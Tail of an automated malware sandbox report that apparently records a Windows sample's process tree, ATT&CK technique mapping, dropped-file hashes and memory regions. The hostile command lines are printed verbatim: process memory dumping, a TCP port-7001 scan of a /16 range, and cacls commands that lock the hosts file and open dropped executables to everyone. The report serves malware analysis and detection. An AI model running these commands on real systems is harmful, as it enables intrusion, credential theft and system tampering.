C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2592 C:\Windows\TEMP\yfuzwlflh\2592.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1800

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2752 C:\Windows\TEMP\yfuzwlflh\2752.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2836 C:\Windows\TEMP\yfuzwlflh\2836.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5080

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2748 C:\Windows\TEMP\yfuzwlflh\2748.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 3760 C:\Windows\TEMP\yfuzwlflh\3760.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 3844 C:\Windows\TEMP\yfuzwlflh\3844.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3860

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 3908 C:\Windows\TEMP\yfuzwlflh\3908.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 3988 C:\Windows\TEMP\yfuzwlflh\3988.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 5112 C:\Windows\TEMP\yfuzwlflh\5112.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4128

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 1656 C:\Windows\TEMP\yfuzwlflh\1656.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 3956 C:\Windows\TEMP\yfuzwlflh\3956.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4808

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 4464 C:\Windows\TEMP\yfuzwlflh\4464.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2844 C:\Windows\TEMP\yfuzwlflh\2844.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4032

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 2612 C:\Windows\TEMP\yfuzwlflh\2612.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:464

C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe
C:\Windows\TEMP\yfuzwlflh\ktitzriiz.exe -accepteula -mp 5004 C:\Windows\TEMP\yfuzwlflh\5004.dmp
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c C:\Windows\yfuzwlflh\ezuhehlec\scan.bat
2⤵
PID:2112

C:\Windows\yfuzwlflh\ezuhehlec\gspkhusbb.exe
gspkhusbb.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:5000

C:\Windows\SysWOW64\cmd.exe
cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
2⤵
PID:2948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4600

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\drivers\etc\hosts /T /D users
3⤵
PID:724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3860

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
3⤵
PID:944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4356

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
3⤵
PID:3460

C:\Windows\SysWOW64\qicmew.exe
C:\Windows\SysWOW64\qicmew.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3532

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F
1⤵
PID:4012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2⤵
PID:1484

C:\Windows\system32\cacls.exe
cacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F
2⤵
PID:3480

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\wrribqi.exe
1⤵
PID:2920

C:\Windows\ime\wrribqi.exe
C:\Windows\ime\wrribqi.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:652

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F
1⤵
PID:4568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2⤵
PID:1708

C:\Windows\system32\cacls.exe
cacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F
2⤵
PID:2988

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F
1⤵
PID:60

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2⤵
PID:5416

C:\Windows\system32\cacls.exe
cacls C:\Windows\TEMP\pkiileske\citubz.exe /p everyone:F
2⤵
PID:4444

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\wrribqi.exe
1⤵
PID:5760

C:\Windows\ime\wrribqi.exe
C:\Windows\ime\wrribqi.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:572

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F
1⤵
PID:5736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2⤵
PID:5536

C:\Windows\system32\cacls.exe
cacls C:\Windows\etfblrkh\wrribqi.exe /p everyone:F
2⤵
PID:1996

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Network Service Discovery

T1046

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll
Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll
Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\pkiileske\config.json
Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\yfuzwlflh\1656.dmp
Filesize
25.7MB

MD5
ebe8447a6e9c56c33a2b798be337fdd7

SHA1
70412b5b87ef2d17d3f846269d469d4324174526

SHA256
5c1736c71da2c9f6d29d7a5f7531978f915b7b118751ec1d5fac68548f6443c2

SHA512
5b541675383329f4f9d0862a9d0177f19f82489f6e3a323975cf9401d08ab68cd660be524f9ce80d367e6eee72b108e89e5d34f5943d0b7c5f28f6209a1f148a

Download Submit
C:\Windows\TEMP\yfuzwlflh\1820.dmp
Filesize
4.1MB

MD5
bf19e7cc09c51aeb199c129e39a62637

SHA1
e73a64476c6531898f4c45b3287ba55ba65e8151

SHA256
795278fe24ac8e9ae93c46c5c64664ecfd096327a3353274e198ff93fca8c0cf

SHA512
270a9059269e116ac73e3c6afd5b2c8c664c3ec55ea9e678b4aacbbcb49f9d0c47c55d47d3dfe7b15ccc99bd0343092f3f8f8290b349d660d411b74d980fb028

Download Submit
C:\Windows\TEMP\yfuzwlflh\2592.dmp
Filesize
4.1MB

MD5
1ce09756c36b5d1de036301612547975

SHA1
9cef058638dde599f68a4db21127724776c2f1f6

SHA256
607bdfa67aa32ba67b285bc374c143ca738ebe569342b47a9e30f0e943dbb5f1

SHA512
6d39a42cb053eef26b8d2e983a5a4cd89e513becf9d6d5993d17504ba09e592aba80b52515b48e327a3fd8d4798330963f22614daaa3fd3bf25eaeef68d0a48b

Download Submit
C:\Windows\TEMP\yfuzwlflh\2748.dmp
Filesize
810KB

MD5
fa603f9cc9ff0bd28a21cc3d0c95726f

SHA1
0d8d91b84c96d4dfd503cf4684a25b975ba33c64

SHA256
b390d318c8060c31203eb5ff73fe0199ac25f64df2cba7c8df51c11a48eedb32

SHA512
f459b57bfdf6a933d176c059f8173cff373bc0c4f157506532527cdc07752ed59cac8de8d0b3be70277bbd98a3ea3d478124862345ef7522118b6913cd668f9a

Download Submit
C:\Windows\TEMP\yfuzwlflh\2752.dmp
Filesize
7.6MB

MD5
391bfb5d9a8ed0faaf4d60c2f40ed502

SHA1
d84ea1987c79343a8ed940d15986985638f991c4

SHA256
7ac6b37eaa626c34b851a0336e6ff74e18cf5c12b2d74ac482c1571d39427fab

SHA512
4a709be4b833976e8f98cb4d979605b77e8abd8335e3624a2053cef49a486e744cabe8a3c93560b4566697d7435419ad96d4d69011ea5d8b62cc966bc33867c1

Download Submit
C:\Windows\TEMP\yfuzwlflh\2836.dmp
Filesize
2.9MB

MD5
9e14faad4c06ee40ff143f6dbba82436

SHA1
22507ecfeaa9ccabad2c89873efaf4aab84d61b5

SHA256
1febb81d7acd0785bc8ba5e0ca2649a7dce66ba67c3c2b20b54c65b95a5c0efd

SHA512
035d4de3f6d17a19e043d33535ac6302d2dd6cfa19f6aaf6b09eed16d9aa7934b91ee2fbec9b51ac57630de2d5cfbd8a63b6666b66f5b6c7a02fc2141e3bcfb5

Download Submit
C:\Windows\TEMP\yfuzwlflh\3760.dmp
Filesize
2.9MB

MD5
3e0bd3242250fc108e2479549cf341c8

SHA1
1a4b2890dc62ae2c4e33440820cfaad6b5ad29a7

SHA256
6d525a7ac33f0c84860e55e4b81bb76ea6de72169dcfaf1abf29b144db1b9470

SHA512
3c94e27ae60f7e10f1ac274fe8e56af700f78fa507c85af5a73b44bd2c07d4310b08ccf3ed80a70ec068be6b7bdb143d5eb0eb5f9429ea666854fdc3ebc0fdd0

Download Submit
C:\Windows\TEMP\yfuzwlflh\3844.dmp
Filesize
20.5MB

MD5
cfa1366ebc3a9c1f31d7c334459c6a7f

SHA1
327d423157747ff5df087a041fd1f59c8c84df02

SHA256
f088dddba200dac4841bc967f6cca48c1672393605f2f2dcb546ac80b8ea7a1b

SHA512
c1b2f6e888498436c49a4509d051910f420ceaa54acbe5782431281614227951003b0e08a4e988f0163b2df545378423d914219aca5d320ade825ec13da09c5e

Download Submit
C:\Windows\TEMP\yfuzwlflh\3908.dmp
Filesize
4.6MB

MD5
7d28faffdc64a776a938f164a73f2ab7

SHA1
ebe300ba4ed32db0a926f9971a348b765f954344

SHA256
44c5ae4a8a9a705932debba96b81b504ce9c85a31b20c9d1656fe8ae88211cc6

SHA512
a842ba4e717b008479e58d1a0e282af7bc07b035a9d1ff8938c9e7ee17d1797e4eb235c703624c29871879f6017075fef2370175fdc28d2739cb3958c8b06f2a

Download Submit
C:\Windows\TEMP\yfuzwlflh\3956.dmp
Filesize
8.7MB

MD5
01ae07bd7cc3b8e2aced954bf50f8b68

SHA1
d9c4f777d1f8df8fe718668958d35831843ffbb7

SHA256
82a7d80171dbec7cd55cf9056105340b83697c0bfb45badebd7495d9a8950a7e

SHA512
83d0f3242be17105f2b814b88ae90bf2844fccb9b6413013c5f00d52fade08b1ff9e7ebc301281268b5eb90cdcb0a1aac0c12d5728c0ef1fa66275cea7e08948

Download Submit
C:\Windows\TEMP\yfuzwlflh\3988.dmp
Filesize
45.4MB

MD5
9615f08b9397492ea79b76bdd2be26b6

SHA1
4ce1f48db85c2127544535ed515401e3fe18762c

SHA256
a2c5a36d43039064122f9d75485194d42e14c5e3c922e824bfffdc8a90e41df4

SHA512
7164d1bdb80472bfd3b984d091884febc813e9d4aa410b42bee5a5733d12bd0cad884f147c4c6f92fedda581011a9e98d2c08ee564af1c6f63629ac8615a5bd9

Download Submit
C:\Windows\TEMP\yfuzwlflh\428.dmp
Filesize
33.6MB

MD5
58d1b5f08f578b4c2746d9dd88ab26e0

SHA1
f9a3c610d24b2af62a90e7c9f907006ac08538e2

SHA256
1d4908f5b768ac1e8d2ad3ac5eb1ca808542551442e519ed89698eee1d8f6009

SHA512
82e669126fe0069d5d2dfaf2f5b7625339daa761c2ba4671b0934b86e700835fb5b2fb564559321852234f8629f610318a0cc3f255be57d09ff5fcda8e5410c0

Download Submit
C:\Windows\TEMP\yfuzwlflh\4464.dmp
Filesize
2.8MB

MD5
7c4ed31047e1b3b9925f280dded3b5c5

SHA1
5cb483ffcddbe25c32f3659f1e48ae5b56a6cfe3

SHA256
6b14b622775ed2b63f85aa7021fa0a8ee9678739796dddade871ba1202cdaf05

SHA512
8f037659d251411df9caaa56ee771b7fb47247e8a08502bfa8c01cfb822e6c15530df4f93c6c516912c0bc17a9f280ce88f03787b8defece593ace96b0f1aa44

Download Submit
C:\Windows\TEMP\yfuzwlflh\5112.dmp
Filesize
1.1MB

MD5
4c8395676ac8cdf4251a901b8e169018

SHA1
eb064f09b2f37f9be67133fcdddb7e0b3d9c4948

SHA256
d41e46181d1e6b55178da0d93e8df11570522442a7af5a7a496f27755df763c7

SHA512
1a8efd202ac318011e26b38fb851954fc6520dce88edc2417983f03693127ff5f8a0359927c674293b795f8b80613ccd05ce5e0d1984a3774f451bc16aa9000c

Download Submit
C:\Windows\TEMP\yfuzwlflh\832.dmp
Filesize
1015KB

MD5
c7e6980b6c351bc20bd25dc525eeef3c

SHA1
7663aa99cfbb0a50358bd0b49c2543925ac0d60e

SHA256
8e08ee2f2c422fbd676ba06ffd9200c83da346fd9db3ab9a2e97229e126143fb

SHA512
7be0ff2583cdc9ef568f65bce2671a746fb90358360d8d49ab7538158849a694e1048ba03a783647ee25d6c10f8ea7ddd30327888158c56c2139b2b64f255963

Download Submit
C:\Windows\Temp\nss8CA2.tmp\System.dll
Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nss8CA2.tmp\nsExec.dll
Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\pkiileske\citubz.exe
Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\xohudmc.exe
Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\Temp\yfuzwlflh\ktitzriiz.exe
Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\etfblrkh\wrribqi.exe
Filesize
8.9MB

MD5
d2e63e50a9b5eaa5c8c3b98a706ed0b1

SHA1
fbca4f6443e8dc72bc4c15e2144557df5f1ec13d

SHA256
6e9a9d678fec6a985bdd4542d26fdd97cdb6b247273b58bd0ac8c75321a1088d

SHA512
64e5e332985f982c5ef7b74dd98c80ddca4595116f5436193cbde5766adfba5c8753ac96d690084c2f78eefba66464771629ed9e69426b24113c62fe80af9897

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
C:\Windows\yfuzwlflh\Corporate\vfshost.exe
Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\yfuzwlflh\ezuhehlec\bilmicikh.exe
Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\yfuzwlflh\ezuhehlec\wpcap.exe
Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
memory/464-233-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/628-191-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/816-174-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/1068-78-0x0000000001160000-0x00000000011AC000-memory.dmp

Filesize
304KB

Download
memory/1332-183-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/1800-178-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/1844-209-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/1940-237-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/1948-227-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/1996-218-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/2300-161-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2300-143-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/2364-196-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/2768-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3472-170-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/3520-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3520-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3544-152-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/3544-159-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/3860-201-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/4032-230-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/4048-205-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/4128-214-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/4808-223-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download
memory/5000-247-0x0000000000EF0000-0x0000000000F02000-memory.dmp

Filesize
72KB

Download
memory/5024-137-0x00007FF72EAE0000-0x00007FF72EBCE000-memory.dmp

Filesize
952KB

Download
memory/5024-136-0x00007FF72EAE0000-0x00007FF72EBCE000-memory.dmp

Filesize
952KB

Download
memory/5032-167-0x000002875C5B0000-0x000002875C5C0000-memory.dmp

Filesize
64KB

Download
memory/5032-249-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-211-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-164-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-255-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-231-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-199-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-181-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-193-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-248-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-220-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-250-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-252-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5032-254-0x00007FF7E5560000-0x00007FF7E5680000-memory.dmp

Filesize
1.1MB

Download
memory/5080-187-0x00007FF741220000-0x00007FF74127B000-memory.dmp

Filesize
364KB

Download